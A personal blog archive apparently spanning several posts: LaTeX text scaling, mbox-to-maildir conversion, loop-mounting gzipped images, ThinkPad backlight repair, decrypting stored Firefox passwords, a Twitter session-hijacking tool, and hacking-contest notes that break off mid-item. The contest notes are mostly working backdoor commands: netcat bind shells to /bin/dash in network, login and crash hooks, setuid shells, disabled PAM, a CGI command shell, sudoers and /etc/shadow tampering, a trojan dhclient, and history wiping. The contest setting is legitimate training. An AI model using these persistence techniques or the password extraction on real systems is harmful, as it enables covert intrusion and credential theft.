Scale Text to the maximum of a page with LaTeX

Being confronted with having to produce a simple poster that holds just a few letter but prints them as big as possible, I found myself needing to scale text (or a letter) on a page.

At first, I found \scalebox, which unfortunately takes a scaling factor, and not two dimensions. Instead of trying to do math, I found \resizebox which does take dimensions (width and height).

You could think that simply scaling up to the \textwidth is enough, but it’s not as you can see from the following “l” which was typeset using this code:

\documentclass[
landscape,
a6paper,
]{scrartcl}
\usepackage[pdftex]{graphicx}
\usepackage{palatino}
\begin{document}
\resizebox{\textwidth}{!}{l}%
\end{document}

And here’s the result:

"l" doesn't scale on A6 landscape paper

So the character doesn’t scale well in the sense that if it is too narrow, it would grow too tall. Unfortunately, it doesn’t automatically keep the aspect ratio and it doesn’t take such an argument as \includegraphic does. Fortunately, you can still make it keep the aspect ratio by globally setting the appropriate flag! So the following will work as expected:

\documentclass[landscape]{minimal}
\usepackage[showframe,a4paper]{geometry}
\usepackage{graphicx}
\setkeys{Gin}{keepaspectratio}

\newcommand{\vstretch}[1]{\vspace*{\stretch{#1}}}
\usepackage{palatino}
\begin{document}
\resizebox{\textwidth}{\textheight}{l}%
\end{document}

Another last thing is then multiline and centered output. The awesome people over at texexchange have a solution:

\documentclass[landscape]{minimal}
\usepackage[showframe,a6paper]{geometry}
\usepackage{varwidth}
\usepackage{graphicx}
\setkeys{Gin}{keepaspectratio}

\newcommand{\vstretch}[1]{\vspace*{\stretch{#1}}}
\usepackage{palatino}
\begin{document}
\topskip0pt
% This seems to fully work
\vstretch{1}
\centering\noindent\resizebox*\textwidth\textheight{\begin{varwidth}{\textwidth}%
\centering%
foooooooooooooooo

\centering
bar%
\end{varwidth}}

\vstretch{1}

\pagebreak
% Trying to other method with the table
\vstretch{1}
\centering\noindent\resizebox*\textwidth\textheight{\begin{varwidth}{\textwidth}%
\begin{tabular}{@{}c@{}}
foooooooooooooooo\\

bar
\end{tabular}%
\end{varwidth}}
\vstretch{1}

\end{document}

And the rendered result:

Converting Mailman archives (mboxes) to maildir

I wanted to search discussions on mailing lists and view conversations. I didn’t want to use some webinterface because that wouldn’t allow me to search quickly and offline. So making my mail client aware of these emails seemed to be the way to go. Fortunately, the GNOME mailinglists are mbox archived. So you download the entire traffic in a standardised mbox.

But how to properly get this into your email clients then? I think Thunderbird can import mbox natively. But I wanted to access it from other clients, too, so I needed to make my server aware of these emails. Of course, I configured my mailserver to use maildir, so some conversion was needed.

I will present my experiences dealing with this problem. If you want to do similar things, or even only want to import the mbox directly, this post might be for you.

The archives

First, we need to get all the archives. As I had to deal with a couple of mailinglists and more than a couple of month, I couldn’t be arsed to click every single mbox file manually.

The following script scrapes the mailman page. It makes use of the interesting Splinter library, basically a wrapper around selenium and other browsers for Python.

#!/usr/bin/env python

import getpass
from subprocess import Popen, list2cmdline
import sys

import splinter

def fill_password(b, username=None, password=None):
    if not username:
        username = getpass.getpass('username: ')
    if not password:
        password = getpass.getpass('password: ')
        
    b.fill('username', username)
    b.fill('password', password)
    b.find_by_name('submit').click()


def main(url, username=None):
    b = splinter.Browser()
    
    try:
        #url = 'https://mail.gnome.org/mailman/private/board-list/'
        b.visit(url)
        
        if 'Password' in b.html:
            fill_password(b, username=username)


        links = [l['href'] for l in b.find_link_by_partial_text('Text')]

        cookie = b.driver.get_cookies()[0]
        cookie_name = cookie['name']
        cookie_value = cookie['value']
        cookie_str = "Cookie: {name}={value}".format(name=cookie_name, value=cookie_value)
        wget_cookie_arg = '--header={0}'.format(cookie_str)
        #print  wget_cookie_arg
        
        b.quit()

        
        for link in links:
            #print link
            cmd = ['wget', wget_cookie_arg, link]
            print list2cmdline(cmd)
            # pipe that to "parallel -j 8"

    except:
        b.quit()


if __name__ == '__main__':
    site = sys.argv[1]
    user = sys.argv[2]
    
    if site.startswith('http'):
        url=site
    else:
        url = 'https://mail.gnome.org/mailman/private/{0}'.format(site)
    
    main(username=user, url=url)

        

You can download the thing, too.

I use splinter because handling cookies is not fun as well as parsing the web page. So I just use whatever is most convenient for me, I wanted to get things done, after all. The script will print a line for each link it found, nicely prefixed with wget and its necessary arguments for the authorization cookie. You can pipe that to sh but if you want to download many month, you want to do it in parallel. And fortunately, there is an app for that!

Conversion to maildir

After having received the mboxes, it turned out to be a good idea nonetheless to convert to maildir; if only to extract properly formatted mails only and remove duplicates.

I came around mb2md-3.20.pl from 2004 quite soon, but it is broken. It cannot parse the mboxes I have properly. It will create broken mails with header lingering around as it seems to be unable to detect the beginning of new mails reliably. It took me a good while to find the problem though. So again, be advised, do not use mb2md 3.20.

As I use mutt myself I found this blog article promising. It uses mutt to create a mbox out of a maildir. I wanted it the other way round, so after a few trial and errors, I figured that the following would do what I wanted:

mutt -f mymbox -e 'set mbox_type=maildir; set confirmcreate=no; set delete=no; push "T.*;s/tmp/mymuttmaildir"'

where “mymbox” is your source file and “/tmp/mymuttmaildir” the target directory.

This is a bit lame right? We want to have parameters, because we want to do some batch processing on many archive mboxes.

The problem is, though, that the parameters are very deep inside the quotes. So just doing something like

mutt -f $source -e 'set mbox_type=maildir; set confirmcreate=no; set delete=no; push "T.*;s$target"'

wouldn’t work, because the $target would be interpreted as a raw string due to the single quotes. And I couldn’t find a way to make it work so I decided to make it work with the language that I like the most: Python. So an hour or so later I came up with the following which works (kinda):

import os
import subprocess
source = os.environ['source']
destination = os.environ['destination']

conf = 'set mbox_type=maildir; set confirmcreate=no; set delete=no; push "T.*;s{0}"'.format(destination)

cmd = ['mutt', '-f', source, '-e', conf]
subprocess.call(cmd)

But well, I shouldn’t become productive just yet by doing real work. Mutt apparently expects a terminal. It would just prompt me with “No recipients were specified.”.

So alright, this unfortunately wasn’t what I wanted. I you don’t need batch processing though, you might very well go with mutt doing your mbox to maildir conversion (or vice versa).

Damnit, another two hours or more wasted on that. I was at the point of just doing the conversion myself. Shouldn’t be too hard after all, right? While researching I found that Python’s stdlib has some email related functions *yay*. Some dude on the web wrote something close to what I needed. I beefed it up a very little bit and landed with the following:

#!/usr/bin/env python

# http://www.hackvalue.nl/en/article/109/migrating%20from%20mbox%20to%20maildir

import datetime
import email
import email.Errors
import mailbox
import os
import sys
import time


def msgfactory(fp):
    try:
        return email.message_from_file(fp)
    except email.Errors.MessageParseError:
        # Don't return None since that will
        # stop the mailbox iterator
        return ''
dirname = sys.argv[1]
inbox = sys.argv[2]
fp = open(inbox, 'rb')
mbox = mailbox.UnixMailbox(fp, msgfactory)


try:
        storedir = os.mkdir(dirname, 0750)
        os.mkdir(dirname + "/new", 0750)
        os.mkdir(dirname + "/cur", 0750)
except:
        pass

count = 0
for mail in mbox:
        count+=1
        #hammertime = time.time() # mail.get('Date', time.time())
        hammertime = datetime.datetime(*email.utils.parsedate(mail.get('Date',''))[:7]).strftime('%s')
        hostname = 'mb2mdpy'
        filename = dirname + "/cur/%s%d.%s:2,S" % (hammertime, count, hostname)
        mail_file = open(filename, 'w+')
        mail_file.write(mail.as_string())


print "Processed {0} mails".format(count)

And it seemed to work well! It recovered many more emails than the Perl script (hehe) but the generated maildir wouldn’t work with my IMAP server. I was confused. The mutt maildirs worked like charm and I couldn’t see any difference to mine.

I scped the file onto my .maildir/ on my server, which takes quite a while because scp isn’t all too quick when it comes to many small files. Anyway, it wouldn’t necessarily work for some reason which is way beyond me. Eventually I straced the IMAP server and figured that it was desperately looking for a tmp/ folder. Funnily enough, it didn’t need that for other maildirs to work. Anyway: Lesson learnt: If your dovecot doesn’t play well with your maildir and you have no clue how to make it log more verbosely, check whether you need a tmp/ folder.

But I didn’t know that so I investigated a bit more and I found another PERL script which converted the emails fine, too. For some reason it put my mails in “.new/” and not in “.cur/“, which the other tools did so far. Also, it would leave the messages as unread which I don’t like.

Fortunately, one (more or less) only needs to rename the files in a maildir to end in S for “seen”. While this sounds like a simple

for f in maildir/cur/*; do mv ${f} ${f}:2,S

it’s not so easy anymore when you have to move the directory as well. But that’s easily being worked around by shuffling the directories around.

Another, more annoying problem with that is “Argument list too long” when you are dealing with a lot of files. So a solution must involve “find” and might look something like this: find ${CUR} -type f -print0 | xargs -i -0 mv '{}' '{}':2,S

Duplicates

There was, however, a very annoying issue left: Duplicates. I haven’t investigated where the duplicates came from but it didn’t matter to me as I didn’t want duplicates even if the downloaded mbox archive contained them. And in my case, I’m quite confident that the mboxes are messed up. So I wanted to get rid of duplicates anyway and decided to use a hash function on the file content to determine whether two file are the same or not. I used sha1sum like this:

$ find maildir/.board-list/ -type f -print0 | xargs -0 sha1sum   | head
c6967e7572319f3d37fb035d5a4a16d56f680c59  maildir/.board-list/cur/1342797208.000031.mbox:2,
2ea005ec0e7676093e2f488c9f8e5388582ee7fb  maildir/.board-list/cur/1342797281.000242.mbox:2,
a4dc289a8e3ebdc6717d8b1aeb88959cb2959ece  maildir/.board-list/cur/1342797215.000265.mbox:2,
39bf0ebd3fd8f5658af2857f3c11b727e54e790a  maildir/.board-list/cur/1342797210.000296.mbox:2,
eea1965032cf95e47eba37561f66de97b9f99592  maildir/.board-list/cur/1342797281.000114.mbox:2,

and if there were two files with the same hash, I would delete one of them. Probably like so:

    #!/usr/bin/env python
    import os
    import sys


    hashes = []
    for line in sys.stdin.readlines():
        hash, fname = line.split()
        if hash in hashes:
            os.unlink(fname)
        else:
            hashes.append(hash)

But it turns out that the following snippet works, too:

find /tmp/maildir/ -type f -print0 | xargs -0 sha1sum | sort | uniq -d -w 40 | awk '{print $2}' | xargs rm

So it’ll check the files for the same contents via a sha1sum. In order to make uniq detect equal lines, we need to give it sorted input. Hence the sort. We cannot, however, check the whole lines for equality as the filename will show up in the line and it will of course be different. So we only compare the size of the hex representation of the hash, in this case 40 bytes. If we found such a duplicate hash, we cut off the hash, take the filename, which is the remainder of the line, and delete the file.

Phew. What a trip so far. Let’s put it all together:

The final thing


LIST=board-list

umask 077

DESTBASE=/tmp/perfectmdir

LISTBASE=${DESTBASE}/.${LIST}

CUR=${LISTBASE}/cur
NEW=${LISTBASE}/new
TMP=${LISTBASE}/tmp

mkdir -p ${CUR}
mkdir -p ${NEW}
mkdir -p ${TMP}

for f in  /tmp/${LIST}/*; do /tmp/perfect_maildir.pl ${LISTBASE} < ${f} ; done
mv ${CUR} ${CUR}.tmp
mv ${NEW} ${CUR}
mv ${CUR}.tmp ${NEW}
find ${CUR} -type f -print0 | xargs -i -0 mv '{}'  '{}':2,S
find ${CUR} -type f -print0 | xargs -0 sha1sum | sort | uniq -d -w 40 | awk '{print $2}' | xargs rm

And that’s handling email in 2012…

Loopback monting huge gzipped file

This is basically a note to myself for future reference which I hope is interesting to others.

I just had to loopback mount a gzipped image file. I didn’t want, however, to unpack the file, because I am very short on disk space right now. Also, I didn’t care too much about processing power. I searched quite a bit until I found “avfs“.

AVFS is a system, which enables all programs to look inside archived or compressed files, or access remote files without recompiling the programs or changing the kernel.

At the moment it supports floppies, tar and gzip files, zip, bzip2, ar and rar files, ftp sessions, http, webdav, rsh/rcp, ssh/scp

muelli@xbox:/tmp$ avfsd -o allow_root ~/.avfs
muelli@xbox:/tmp$ cd  ~/.avfs/home/muelli/qemu
muelli@xbox:~/.avfs/home/muelli/qemu$ sudo losetup /dev/loop1 XP-4G.ntfs.dd.gz#
muelli@xbox:~/.avfs/home/muelli/qemu$ sudo mount /dev/loop1 -oro,noatime /home/muelli/empty/

Note that the filename I’m accessing is suffixed with a hash.

x61s and the backlight, replacing a CCFL and shorten a fuse

Over the last months, I tried to repair my broken x61s which suffered from a missing backlight.

First, I changed the inverter, which is easy and relatively cheap to do. In case you read the Hardware Maintenance Manual, don’t follow it too closely. The inverter is easily changeable by removing the three screws on the bottom of the opened panel and carefully detaching the clipped front cover of the panel. The inverter sits on the bottom right and is the part that also lights the LEDs. You can’t miss it. But be careful: The inverter puts out high voltage, in the range of 600V to 800V, peaking at 1500V. Hence it’s hard to measure with normal home equipment :-/

Anyway, changing the inverter didn’t bring my backlight back up. So I got myself a LCD cable which is more expensive and a bit harder to attach than the inverter. You need to remove the LCD panel from its case which involves a lot of screws. Don’t miss to have separate bowls for the screws and even better: take pictures or notes to remember where the screws have been. Or be very disciplinary to follow the official instructions.

However, changing the LCD cable didn’t bring any remedy. So the only culprit, that I could think of, was the CCFL that’s actually responsible for lighting up the whole thing. So I got myself a new CCFL for a couple of euros.

Changing the CCFL is a bit messy, especially because it involves soldering. There are good instructions on the web as to how to change the CCFL. It also requires you to be very kind with the the tube so that it doesn’t break. And losing any part will probably result in a substantial loss of quality for you, so be careful. I mean it. I lost a tiny rubber ring which is to be placed around the tube to hold it tight in its channel and now the tube vibrates nicely in the panel making interesting noises.

Anyway, changing the CCFL didn’t bring back the backlight. I was very confused. There was no part I knew of that I didn’t change. With the exception of the motherboard… So I asked a friend of mine to provide his perfectly working x61s so that we’d have a reference platform that we knew was working. Thanks again to that friendly fellar that allowed the disassembly and reassembly of his machines several times 🙂 We switched several parts and it turned out that my panel with the new CCFL kinda works with the other inverter card. It didn’t with my inverter though. Again, very weird. As it turned out later, the CCFL contacts were not correctly isolated and short circuited :-/ But we didn’t know and thought the CCFL was broken from the very beginning. So my recommendation, which is also more (unpleasant) work, is: Checkpoint your work, i.e. run a test every now and then. It
would have saved us a lot of trouble.

So after having cross checked that my inverter was working correctly and the backlight was acting weird, I came across the fact that there might be a blown fuse. And well, the F2 fuse, which was not findable without the helping picture, was not letting anything through. Since it’s a SMD fuse there was no chance of soldering a new fuse onto the mainboard. So we just shortened the fuse with conducting silver paint.

Fortunately, the laptop’s backlight is working again, now. However, the keyboard is not. I presume that the whole dis- and reassembly shortened the lifespan of the keyboard cable. Also, as I mentioned, the CCFL is humming in the panel…

Dump Firefox passwords using Python (and libnss)

I was travelling and I didn’t have my Firefox instance on my laptop. I wanted, however, access some websites and the passwords were stored safely in my Firefox profile at home. Needless to say that I don’t upload my passwords to someone’s server. Back in the day, when I first encountered that problem, there were only ugly options to run the server yourself. Either some PHP garbage or worse: some Java Webapp. I only have so many gigabytes of RAM so I didn’t go that route. FWIW: Now you have a nice Python webapp and it might be interesting to set that up at some stage.

I could have copied the profile to my laptop and then ran Firefox with that profile. But as I use Zotero my profile is really big. And it sounds quite insane, because I only want to get hold of my 20 byte password, and not copy 200MB for that.

Another option might have been to run the Firefox remotely and do X-forwarding to my laptop. But that’d be crucially slow and I thought that I was suffering enough already.

So. I wanted to extract the passwords from the Firefox profile at home. It’s my data after all, right? Turns out, that Firefox (and Thunderbird for that matter) store their passwords encryptedly in a SQLite database. So the database itself is not necessarily encrypted, but the contained data. Turns out later, that you can as well encrypt the database (to then store encrypted passwords).

So a sample line in that database looks like this:

$ sqlite3 signons.sqlite 
SQLite version 3.7.11 2012-03-20 11:35:50
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE moz_deleted_logins (id                  INTEGER PRIMARY KEY,guid                TEXT,timeDeleted         INTEGER);
CREATE TABLE moz_disabledHosts (id                 INTEGER PRIMARY KEY,hostname           TEXT UNIQUE ON CONFLICT REPLACE);
CREATE TABLE moz_logins (id                 INTEGER PRIMARY KEY,hostname           TEXT NOT NULL,httpRealm          TEXT,formSubmitURL      TEXT,usernameField      TEXT NOT NULL,passwordField      TEXT NOT NULL,encryptedUsername  TEXT NOT NULL,encryptedPassword  TEXT NOT NULL,guid               TEXT,encType            INTEGER, timeCreated INTEGER, timeLastUsed INTEGER, timePasswordChanged INTEGER, timesUsed INTEGER);
CREATE INDEX moz_logins_encType_index ON moz_logins(encType);
...
...
sqlite> SELECT * FROM moz_logins LIMIT 2;
1|https://nonpublic.foo.bar|Non-Pulic Wiki||||MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFKoZIhvcNAwcECFKoZIhvcNAwcECF|MDIEEPgAAAAAAAAAAAAAACJ75YchXUCAAAAAEwFAYIKoZIhvcNAwcE==|{4711r2d2-2342-4711-6f00b4r6g}|1|1319297071173|1348944692451|1319297071173|6
2|https://orga.bar.foo|ToplevelAuth||||MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECIy5HFAYIKoZIhtnRFAYIKoZIh|MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvFAYIKoZIhBD6PFAYIKoZIh|{45abc67852-4222-45cc-dcc1-729ccc91ceee}|1|1319297071173|1319297071173|1319297071173|1
sqlite> 

You see the columns you’d more or less expect but you cannot make sense out of the actual data.

If I read correctly, some form of 3DES is used to protect the data. But I couldn’t find out enough to decrypt it myself. So my idea then was to reuse the actual libraries that Firefox uses to read data from the database.

I first tried to find examples in the Firefox code and found pwdecrypt. And I even got it built after a couple of hours wrestling with the build system. It’s not fun. You might want to try to get hold of a binary from your distribution.

So my initial attempt was to call out to that binary and parse its output. That worked well enough, but was slow. Also not really elegant and you might not have or not be able to build the pwdecrypt program. Also, it’s a bit stupid to use something different than the actual Firefox. I mean, the code doing the necessary operations is already on your harddisk, so it seems much smarter to reuse that.

Turns out, there is ffpwdcracker to decrypt passwords using libnss. It’s not too ugly using Python’s ctypes. So that’s a way to go. And in fact, it works well enough, after cleaning up loads of things.

Example output of the session is here:


$ python firefox_passwd.py | head
FirefoxSite(id=1, hostname=u'https://nonpublic.foo.bar', httpRealm=u'Non-Pulic Wiki', formSubmitURL=None, usernameField=u'', passwordField=u'', encryptedUsername=u'MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFKoZIhvcNAwcECFKoZIhvcNAwcECF', encryptedPassword=u'MDIEEPgAAAAAAAAAAAAAACJ75YchXUCAAAAAEwFAYIKoZIhvcNAwcE==', guid=u'{4711r2d2-2342-4711-6f00b4r6g}', encType=1, plain_username='wikiuser', plain_password='mypass')
FirefoxSite(id=2, hostname=u'https://orga.bar.foo', httpRealm=u'ToplevelAuth', formSubmitURL=None, usernameField=u'', passwordField=u'', encryptedUsername=u'MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECIy5HFAYIKoZIhtnRFAYIKoZIh', encryptedPassword=u'MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvFAYIKoZIhBD6PFAYIKoZIh', guid=u'{45abc67852-4222-45cc-dcc1-729ccc91ceee}', encType=1, plain_username='suspect', plain_password='susicious')

The file is here: https://hg.cryptobitch.de/firefox-passwords/

It has also been extended to work with Thunderbird and, the bigger problem, with encrypted databases. I couldn’t really find out, how that works. I read some code, especially the above mentioned pwdecrypt program, but couldn’t reimplement it, because I couldn’t find the functions used in the libraries I had. At some stage, I just explained the problem to a friend of mine and while explaining and documenting, which things didn’t work, I accidentally found a solution \o/ So now you can also recover your Firefox passwords from an encrypted storage.

Pwnitter

Uh, I totally forgot to blog about a funny thing that happened almost a year ago which I just mentioned slightly *blush*. So you probably know this Internet thing and if you’re one of the chosen and carefully gifted ones, you confused it with the Web. And if you’re very special you do this Twitter thing and expose yourself and your communications pattern to some dodgy American company. By now, all of the following stuff isn’t of much interest anymore, so you might as well quit reading.

It all happenend while being at FOSS.in. There was a contest run by Nokia which asked us to write some cool application for the N900. So I did. I packaged loads of programs and libraries to be able to put the wireless card into monitor mode. Then I wiretapped (haha) the wireless and sniffed for Twitter traffic. Once there was a Twitter session going on, I sniffed the necessary authentication information was extracted and a message was posted on the poor user’s behalf. I coined that Pwnitter, because it would pwn you via Twitter.

That said, we had great fun at FOSS.in, where nearly everybodies Twitter sessions got hijacked 😉 Eventually, people stopped using plain HTTP and moved to end to end encrypted sessions via TLS.

Anyway, my program didn’t win anything because as it turned out, Nokia wanted to promote QML and hence we were supposed to write something that makes use of that. My program barely has a UI… It is made up of one giant button…

Despite not getting lucky with Nokia, the community apparently received the thing very well.

So there is an obvious big elephant standing in the room asking why would you want to “hack” Twitter. I’d say it’s rather easy to answer. The main point being that you should use end to end encryption when doing communication. And the punchline comes now: Don’t use a service that doesn’t offer you that by default. Technically, it wouldn’t be much of a problem to give you an encrypted link to send your messages. However, companies tend to be cheap and let you suffer with a plain text connection which can be easily tapped or worse: manipulated. Think about it. If the company is too frugal to protect your communication from pimpled 13yr olds with a wifi card, why would you want to use their services?

By now Twitter (actually since March 2011, making it more than 6 month ago AFAIK) have SSL enabled by default as far as I can tell. So let’s not slash Twitter for not offering an encrypted link for more than 5 years (since they were founded back in 2006). But there are loads of other services that suffer from the very same basic problem. Including Facebook. And it would be easy to adapt the existing solution stuff like Facebook, flickr, whatnot.

A noteable exception is Google though. As far as I can see, they offer encryption by default except for the search. If there is an unencrypted link, I invite you to grab the sources of Pwnitter and build your hack.

If you do so, let me give you an advise as I was going nuts over a weird problem with my Pwnitter application for Maemo. It’s written in Python and when building the package with setuptools the hashbang would automatically be changed to “#!/scratchbox/tools/bin/python“, instead of, say, “/usr/bin/python“.

I tried tons of things for many hours until I realised, that scratchbox redirects some binary paths.

However, that did not help me to fix the issue. As it turned out, my problem was that I didn’t depend on a python-runtime during build time. Hence the build server picked scratchbox’s python which was located in /scratchbox/bin.

LinuxTag Hacking Contest Notes

As I wrote the other day, I have been to LinuxTag in Berlin. And Almost like last year a Hacking contest took place.

LinuxTag 2011 - Hacking Contest

The rules were quite the same: Two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops so that you have the opponents machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off what backdoors were left in the system.

So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out to not be very good for the actual contest, because they are not structured well enough.

Since the game has three rounds, it makes sense to have a structure with three parts as well. Hence I produced a new set of notes with headlines for each backdoor and three parts per section. Namely Hacking, Fixing and Exploiting.

The notes weren’t all ready just before the contest and hence we didn’t score pretty well. But I do think that our notes are quite cool by now though. Next time, when we’re more used to the situation and hopefully learned through suffering to not make all those tiny mistakes we did, we might play better.

So enjoy the following notes and feel free to give feedback.

Set Keyboard to US English:

setxkbmap us
export HISTFILE=/dev/null
ln -sf ~/.bash_history /dev/null
ln -sf ~/.viminfo /dev/null

while true; do find / -exec touch {} \; ; sleep 2; done


1
  passwd new user

Remote
root


1.1
  Hacking

nano /etc/passwd

copy and paste root user to a new user, i.e. hackr.

sudo passwd hackr


1.2
  Fixing

grep :0: /etc/passwd


1.3
  Exploiting

ssh hackr@localhost


2
  dePAMify

Remote
root


2.1
  Hacking

cd /lib/security/
cp pam_permit.so pam_deny.so
echo > /etc/pam.d/sshd
/etc/init.d/sshd restart


2.2
  Fixing

too hard


2.3
  Exploiting

ssh root@localhost

enter any password


3
  NetworkManager

Remote
root


3.1
  Hacking

nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF
nc.traditional -l -p 31346 -e /bin/bash &
cp /bin/dash /etc/NetworkManager/dhclient
chmod +s /etc/NetworkManager/dhclient
EOF


3.2
  Fixing

ls /etc/NetworkManager/dispatcher.d/


3.3
  Exploiting

less /etc/NetworkManager/dispatcher.d/

Disconnect Network via NetworkManager

Connect Network via NetworkManager

/etc/NetworkManager/dhclient

netcat localhost 31346


4
  SSHd

Remote
root


4.1
  Hacking

su -
ssh-keygen
cd
cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys
cat .ssh/id_rsa | tee /etc/issue.net
cp /etc/ssh/sshd_config /tmp/
nano /etc/ssh/sshd_config <<EOF
AuthorizedKeysFile /etc/ssh/authorized_keys
Banner /etc/issue.net
EOF

/etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/


4.2
  Fixing

less /etc/ssh/sshd_config

/etc/init.d/ssh reload


4.3
  Exploiting

ssh root@localhost 2> /tmp/root
chmod u=r,go= $_
ssh  -i /tmp/root root@localhost


5
  xinetd

Remote
root


5.1
  Hacking

cp  /etc/xinetd.d/chargen  /etc/xinetd.d/chargen.bak

nano /etc/xinetd.d/chargen <<EOF

disable = no
DELETE type = INTERNAL
server = /bin/dash
EOF

/etc/init.d/xinetd restart

mv /etc/xinetd.d/chargen.bak  /etc/xinetd.d/chargen


5.2
  Fixing

grep disable  /etc/xinetd.d/* | grep no


5.3
  Exploiting

nc localhost chargen


6
  Apache

Remote
root

Needs testing


6.1
  Hacking

nano /etc/apache2/sites-enabled/000-default

DocumentRoot /
Make <Directory />  and copy allowance from below

/etc/init.d/apache2 restart

touch /usr/lib/cgi-bin/fast-cgid
chmod a+rwxs $_
touch /usr/lib/cgi-bin/fast-cgid.empty
chmod a+rwxs $_
nano /usr/lib/cgi-bin/fast-cgid <<EOF
    #!/bin/bash
    IFS=+
    $QUERY_STRING
EOF

nano /etc/sudoers <<EOF
www-data ALL=NOPASSWD: ALL
EOF


6.2
  Fixing

ls -l /usr/lib/cgi-bin/

nano /etc/apache2/sites-enabled/*

/etc/init.d/apache2 restart


6.3
  Exploiting

links2 http://localhost/  # Remote file access
links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution
grep NOPASS /etc/sudoers  # local privilege escalation
links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution

nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF
/bin/dash
EOF

/usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation


7
  screen

Local
root


7.1
  Hacking

sudo chmod u+s /bin/dash
sudo mkdir -p /etc/screen.d/user/
sudo chmod o+rwt /etc/screen.d/user/
# NOW AS USER!!1
SCREENDIR=/etc/screen.d/user/ screen
# IN THE SCREEN
dash
C-d


7.2
  Fixing

ls -l /var/run/screen
rm -rf /var/run/screen/*

sudo lsof | grep -i screen | grep FIFO
rm these files


7.3
  Exploiting

SCREENDIR=/etc/screen.d/user/ screen -x


8
  hidden root dash

Local
root


8.1
  Hacking

cp /bin/dash /usr/bin/pkexec.d
chmod +s !$
cp /bin/dash /etc/init.d/powersaved
chmod +s !$


8.2
  Fixing

find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

rm these files


8.3
  Exploiting

/etc/init.d/powersaved

/usr/bin/pkexec.d


9
  DHCP Hook

Local
Remote
root


9.1
  Hacking

nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF
nc.traditional -l -p 31347 &
cp /bin/dash /var/run/dhclient
chmod +s /var/run/dhclient
EOF


9.2
  Fixing

ls -l /etc/dhcp3/dhclient-exit-hooks.d/
ls -l /etc/dhcp3/dhclient-enter-hooks.d/


9.3
  Exploiting

Reconnect Network via DHCP

/var/run/dhclient

netcat localhost 31347


10
  ConsoleKit

Local
root

Switchen VTs is triggered locally only, although one might argue that switching terminals is done every boot. Hence it’s kinda automatic.


10.1
  Hacking

sudo -s
touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck
chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck
nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck

#!/bin/sh

chmod u+s /bin/dash
nc.traditional -l -p 31337 -e /bin/dash &


10.2
  Fixing

ls /usr/lib/ConsoleKit/run-seat.d/

Only one symlink named udev-acl.ck is supposed to be there.


10.3
  Exploiting

ls /usr/lib/ConsoleKit/run-seat.d/

Switch TTY (Ctrl+Alt+F3)

execute /bin/dash

nc IP 31337


11
  SIGSEGV

Local
root


11.1
  Hacking

echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern


11.2
  Fixing

cat /proc/sys/kernel/core_pattern
echo core > /proc/sys/kernel/core_pattern


11.3
  Exploiting

ulimit -c unlimited

sleep 1m & pkill -SEGV sleep

nc localhost 31335


12
  nc wrapper

Remote
Local
root


12.1
  Hacking

setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <unistd.h>

int main (int argc, char* args[]) {
    int ret = fork ();
    if (ret == 0) {
        chmod("/bin/dash", 04755);
        execlp ("/usr/bin/nc.traditional", "nc.traditional",
            "-l" ,"-p", "31339", "-e", "/bin/dash", (char*) NULL);
    } else
        execvp("/sbin/dhclient6", args);
    return 0;
}
EOF

/etc/init.d/networking stop                # Or disable via NotworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start               # Or enable via NotworkManager


12.2
  Fixing


12.3
  Exploiting


12.3.1
  real dhclient

Disconnect with Network Manager

Connect with NetworkManager

dash

nc localhost 31339


12.3.2
  cron

Just wait. Or reboot.


13
  evbug

Remote

Writes Keycodes to syslog.
Type: 1 are keypresses, and “code” is the actual keycode.
evtest shows which key maps to which keycode.

Unfortunately, Debian does not seem to have that module.


13.1
  Hacking

modprobe evbug
%FIXME: Maybe pull netconsole

nano /etc/modprobe.d/blacklist.conf


13.2
  Fixing

modprobe -r evbug


13.3
  Exploiting

dmesg | grep  "Type: 1"


14
  Vino

Remote


14.1
  Hacking

sudo -s
xhost +
nohup /usr/lib/vino/vino-server &
vino-preferences


14.2
  Fixing

vino-preferences

ps aux | grep vnc


14.3
  Exploiting

vncviewer IP


15
  GDM InitScript

Local
Remote
root


15.1
  Hacking

nano /etc/gdm/Init/Default <<EOF
cp /bin/dash /etc/gdm/gdm-greeter
chmod +s /etc/gdm/gdm-greeter
nc.traditional -l -p 31345 -e /bin/dash &
EOF


15.2
  Fixing

less /etc/gdm/Init/Default


15.3
  Exploiting

Log off

Log on

/etc/gdm/gdm-greeter

nc localhost 31345


16
  shadow a+rw

Local
root


16.1
  Hacking

chmod a+rw /etc/shadow


16.2
  Fixing

ls -l /etc/shadow

chmod u=rw,g=r /etc/shadow


16.3
  Exploiting

nano /etc/shadow


17
  SysV Init Alt+Up

Local
root


17.1
  Hacking

touch /etc/init.d/throttle
chmod a+x $_
nano $_ <<EOF
#!/bin/sh
